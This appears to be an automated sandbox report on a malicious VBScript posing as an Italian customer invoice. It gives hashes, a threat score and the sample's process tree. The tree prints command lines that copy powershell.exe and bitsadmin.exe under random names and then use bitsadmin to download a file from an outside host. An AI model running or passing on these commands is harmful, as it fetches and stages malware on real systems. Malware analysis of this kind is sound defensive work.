Analysis
-
max time kernel
118s -
max time network
124s -
platform
windows7_x64 -
resource
win7 -
submitted
13-07-2020 07:26
General
-
Target
Fatt_cliente_01557430269.vbs
-
Size
4KB
-
MD5
5b96f2ae8a3683b45b13cabbf3a134ee
-
SHA1
57d4d4b4a328628471949a3d434b5993ce6430ba
-
SHA256
a0291ef7ae4a775b1ac0a6cf14f58dba8ea3703c41cacc73b64f00f46d053766
-
SHA512
f724493f0a1ebdc89ce901e11e30eeb98b82186ae0e748ff2dc80939d2532c6573bdf7e98366b53f568ca8d502a093331779028fe14b5088796f859a4f83e909
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 10 IoCs
-
Executes dropped EXE 1 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_01557430269.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zVWga.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\VWga.exe2⤵
-
C:\Users\Admin\AppData\Roaming\VWga.exe"C:\Users\Admin\AppData\Roaming\VWga.exe" /transfer mTGVIF /download https://mzgotech.com/temha/01557430269/it.gif C:\Users\Admin\AppData\Roaming\it.gif2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\VWga.exe
-
C:\Users\Admin\AppData\Roaming\VWga.exe
-
memory/324-1-0x0000000000000000-mapping.dmp
-
memory/732-3-0x0000000000000000-mapping.dmp
-
memory/1616-0-0x0000000000000000-mapping.dmp